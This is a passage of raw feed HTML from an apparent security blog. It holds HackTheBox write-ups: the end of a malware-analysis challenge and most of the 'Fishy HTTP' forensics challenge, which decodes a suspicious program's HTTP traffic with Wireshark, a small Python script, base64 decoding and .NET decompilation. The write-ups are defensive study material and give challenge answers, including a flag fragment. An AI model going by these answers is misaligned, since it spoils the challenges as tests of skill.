https://substackcdn.com/image/fetch/$s_!tdxI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe2a88a29-fc17-4d09-8a1a-8ee26aae4bcb_1207x259.png 1272w, https://substackcdn.com/image/fetch/$s_!tdxI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe2a88a29-fc17-4d09-8a1a-8ee26aae4bcb_1207x259.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>10. What app did Janice have open the last time she ran the "screenshot app"?</strong></p><ul><li><p><strong>Solution</strong>: Analyze the screenshots from the zip file. Look for visible application interfaces or filenames to identify the app Janice had open.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!hwkU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3b9f2d2-d89f-48f4-bcde-07885253d6b4_628x467.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!hwkU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3b9f2d2-d89f-48f4-bcde-07885253d6b4_628x467.png 424w, https://substackcdn.com/image/fetch/$s_!hwkU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3b9f2d2-d89f-48f4-bcde-07885253d6b4_628x467.png 848w, https://substackcdn.com/image/fetch/$s_!hwkU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3b9f2d2-d89f-48f4-bcde-07885253d6b4_628x467.png 1272w, https://substackcdn.com/image/fetch/$s_!hwkU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3b9f2d2-d89f-48f4-bcde-07885253d6b4_628x467.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!hwkU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3b9f2d2-d89f-48f4-bcde-07885253d6b4_628x467.png" width="628" height="467" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d3b9f2d2-d89f-48f4-bcde-07885253d6b4_628x467.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:467,&quot;width&quot;:628,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!hwkU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3b9f2d2-d89f-48f4-bcde-07885253d6b4_628x467.png 424w, https://substackcdn.com/image/fetch/$s_!hwkU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3b9f2d2-d89f-48f4-bcde-07885253d6b4_628x467.png 848w, https://substackcdn.com/image/fetch/$s_!hwkU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3b9f2d2-d89f-48f4-bcde-07885253d6b4_628x467.png 1272w, https://substackcdn.com/image/fetch/$s_!hwkU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3b9f2d2-d89f-48f4-bcde-07885253d6b4_628x467.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Tools Used:</strong></p><ol><li><p><strong>VirusTotal: For initial binary analysis.</strong></p></li><li><p><strong>Detect-It-Easy (DIE): For static analysis and string extraction.</strong></p></li><li><p><strong>Binary Ninja with GoReSym plugin: For analyzing Golang binaries.</strong></p></li><li><p><strong>GoReSym: To extract symbols and generate .json for Binary Ninja.</strong></p></li><li><p><strong>Zip archive tools: To extract and analyze files like keylog.txt and screenshots.</strong></p></li></ol><p>This write-up demonstrates the importance of using multiple tools and techniques to extract valuable information from malware binaries and associated files.</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Fishy HTTP]]></title><description><![CDATA[Challenge]]></description><link>https://www.byteberzerker.com/p/hack-the-box-fishy-http</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hack-the-box-fishy-http</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Sat, 18 Jan 2025 16:41:34 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!QJKT!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Challenge Description:</strong></p><p>I found a suspicious program on my computer making HTTP requests to a web server. Please review the provided traffic capture and executable file for analysis. (Note: The flag has two parts.)</p><p><strong>Step 1: Extract the provided zip folder</strong></p><ul><li><p>Extract the zip folder you were given. This folder contains a Windows binary and a PCAP file for analysis.</p></li></ul><p><strong>Step 2: Analyze the PCAP File</strong></p><ul><li><p><strong>Tools Used</strong>: Network Miner, Wireshark</p></li><li><p>Open the provided PCAP file in <strong>Network Miner</strong>. You can also use <strong>Wireshark</strong> to manually inspect the captured traffic.</p></li></ul><p><strong>Step 3: Inspect the HTTP Response in Wireshark</strong></p><ul><li><p>In <strong>Wireshark</strong>, filter for http.response to locate the relevant HTTP responses.</p></li><li><p>You should see a stream of data containing random words, numbers, and symbols. These are likely important for obtaining the flag.</p></li></ul><ul><li></li></ul><p><strong>Step 4: Extracting Data from the HTTP Response</strong></p><ul><li><p>Upon closer inspection, it becomes clear that the program is likely concatenating the first letter of each word in the response to form a string. The string is likely base64 encoded.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!QJKT!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!QJKT!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png 424w, https://substackcdn.com/image/fetch/$s_!QJKT!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png 848w, https://substackcdn.com/image/fetch/$s_!QJKT!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png 1272w, https://substackcdn.com/image/fetch/$s_!QJKT!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!QJKT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png" width="1072" height="840" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:840,&quot;width&quot;:1072,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!QJKT!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png 424w, https://substackcdn.com/image/fetch/$s_!QJKT!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png 848w, https://substackcdn.com/image/fetch/$s_!QJKT!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png 1272w, https://substackcdn.com/image/fetch/$s_!QJKT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39c67add-22b3-4227-ab57-28e988dc1c6d_1072x840.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Step 5: Write a Python Script to Extract the First Letter</strong></p><ul><li><p>Create a Python script that will extract the first letter of each word from the response data, keeping symbols and numbers intact.</p></li></ul><p>def extract_first_letters(file_path):<br> result = ""<br> try:<br> # Open the file for reading<br> with open(file_path, 'r') as file:<br> content = file.read() # Read the entire content<br> # Split the content by spaces to get each word<br> words = content.split()<br> for word in words:<br> # If the word starts with an alphabetic letter, take its first character<br> if word[0].isalpha():<br> result += word[0]<br> else:<br> # Otherwise, keep the symbol or number as-is<br> result += word[0]<br> print("Extracted String:", result)<br> except FileNotFoundError:<br> print(f"Error: File '{file_path}' not found.")<br> except Exception as e:<br> print(f"An error occurred: {e}")</p><p># Example usage<br>file_path = "yo.txt" # Change to the path of your text file<br>extract_first_letters(file_path)</p><p><strong>Step 6: Run the Python Script</strong></p><ul><li><p>After running the script on the extracted text file, you'll get an output like the following:</p></li></ul><p>python yo.py<br>Extracted String: IFZvbHVtZSBpbiBkcml2ZSBDIGhhcyBubyBsYWJlbC4NCiBWb2x1bWUgU2VyaWFsIE51bWJlciBpcyBBMDc5LUFERkINCg0KIERpcmVjdG9yeSBvZiBDOlxUZW1wDQoNCjA1LzA3LzIwMjQgIDA5OjIyIEFNICAgIDxESVI+ICAgICAgICAgIC4NCjA1LzA3LzIwMjQgIDA5OjIyIEFNICAgIDxESVI+ICAgICAgICAgIC4uDQowNS8wNy8yMDI0ICAwNzoyMyBBTSAgICAgICAgNjcsNTE1LDc0NCBzbXBob3N0LmV4ZQ0KICAgICAgICAgICAgICAgMSBGaWxlKHMpICAgICA2Nyw1MTUsNzQ0IGJ5dGVzDQogICAgICAgICAgICAgICAyIERpcihzKSAgMjksNjM4LDUyMCw4MzIgYnl0ZXMgZnJlZQ0KJ2g3N1BfczczNDE3aHlfcmV2U0hFTEx9JyANCg==</p><p><strong>Step 7: Decode the Base64 String in CyberChef</strong></p><ul><li><p>Go to <strong>CyberChef</strong> ( <a href="https://gchq.github.io/CyberChef/">https://gchq.github.io/CyberChef/</a>) and paste the extracted string.</p></li><li><p>Use the <strong>Base64 Decode</strong> operation to decode the string.</p></li><li><p>You will receive the second part of the flag.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!L0eM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87d98681-c81f-4137-bbdb-589a773d6d68_1285x803.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!L0eM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87d98681-c81f-4137-bbdb-589a773d6d68_1285x803.png 424w, https://substackcdn.com/image/fetch/$s_!L0eM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87d98681-c81f-4137-bbdb-589a773d6d68_1285x803.png 848w, https://substackcdn.com/image/fetch/$s_!L0eM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87d98681-c81f-4137-bbdb-589a773d6d68_1285x803.png 1272w, https://substackcdn.com/image/fetch/$s_!L0eM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87d98681-c81f-4137-bbdb-589a773d6d68_1285x803.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!L0eM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87d98681-c81f-4137-bbdb-589a773d6d68_1285x803.png" width="1285" height="803" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/87d98681-c81f-4137-bbdb-589a773d6d68_1285x803.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:803,&quot;width&quot;:1285,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!L0eM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87d98681-c81f-4137-bbdb-589a773d6d68_1285x803.png 424w, https://substackcdn.com/image/fetch/$s_!L0eM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87d98681-c81f-4137-bbdb-589a773d6d68_1285x803.png 848w, https://substackcdn.com/image/fetch/$s_!L0eM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87d98681-c81f-4137-bbdb-589a773d6d68_1285x803.png 1272w, https://substackcdn.com/image/fetch/$s_!L0eM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87d98681-c81f-4137-bbdb-589a773d6d68_1285x803.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Step 8: Analyze the Executable Binary</strong></p><ul><li><p>Next, open the <strong>Windows binary</strong> in <strong>Detect It Easy</strong> to determine its origin and the framework it was compiled with.</p><ul><li><p>The binary is identified as a <strong>.NET</strong> executable.</p></li></ul></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Y7ql!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77ddafcd-36b5-4429-bf11-60d4a1132323_719x380.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Y7ql!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77ddafcd-36b5-4429-bf11-60d4a1132323_719x380.png 424w, https://substackcdn.com/image/fetch/$s_!Y7ql!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77ddafcd-36b5-4429-bf11-60d4a1132323_719x380.png 848w, https://substackcdn.com/image/fetch/$s_!Y7ql!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77ddafcd-36b5-4429-bf11-60d4a1132323_719x380.png 1272w, https://substackcdn.com/image/fetch/$s_!Y7ql!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77ddafcd-36b5-4429-bf11-60d4a1132323_719x380.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Y7ql!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77ddafcd-36b5-4429-bf11-60d4a1132323_719x380.png" width="719" height="380" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/77ddafcd-36b5-4429-bf11-60d4a1132323_719x380.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:380,&quot;width&quot;:719,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Y7ql!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77ddafcd-36b5-4429-bf11-60d4a1132323_719x380.png 424w, https://substackcdn.com/image/fetch/$s_!Y7ql!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77ddafcd-36b5-4429-bf11-60d4a1132323_719x380.png 848w, https://substackcdn.com/image/fetch/$s_!Y7ql!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77ddafcd-36b5-4429-bf11-60d4a1132323_719x380.png 1272w, https://substackcdn.com/image/fetch/$s_!Y7ql!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77ddafcd-36b5-4429-bf11-60d4a1132323_719x380.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Step 9: Use dotPeek for Further Analysis</strong></p><ul><li><p>Open the .NET binary in <strong>dotPeek</strong> (or any other .NET decompiler) to analyze its functionality.</p></li><li><p>Look for any dictionaries or strings that could help identify what the binary is doing.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2kZ3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fec78b43c-a09e-4303-bd27-3da054b056d3_1621x432.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2kZ3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fec78b43c-a09e-4303-bd27-3da054b056d3_1621x432.png 424w, https://substackcdn.com/image/fetch/$s_!2kZ3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fec78b43c-a09e-4303-bd27-3da054b056d3_1621x432.png 848w, https://substackcdn.com/image/fetch/$s_!2kZ3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fec78b43c-a09e-4303-bd27-3da054b056d3_1621x432.png 1272w, https://substackcdn.com/image/fetch/$s_!2kZ3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fec78b43c-a09e-4303-bd27-3da054b056d3_1621x432.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2kZ3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fec78b43c-a09e-4303-bd27-3da054b056d3_1621x432.png" width="1456" height="388" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ec78b43c-a09e-4303-bd27-3da054b056d3_1621x432.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:388,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!2kZ3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fec78b43c-a09e-4303-bd27-3da054b056d3_1621x432.png 424w, https://substackcdn.com/image/fetch/$s_!2kZ3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fec78b43c-a09e-4303-bd27-3da054b056d3_1621x432.png 848w, https://substackcdn.com/image/fetch/$s_!2kZ3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fec78b43c-a09e-4303-bd27-3da054b056d3_1621x432.png 1272w, https://substackcdn.com/image/fetch/$s_!2kZ3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fec78b43c-a09e-4303-bd27-3da054b056d3_1621x432.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" 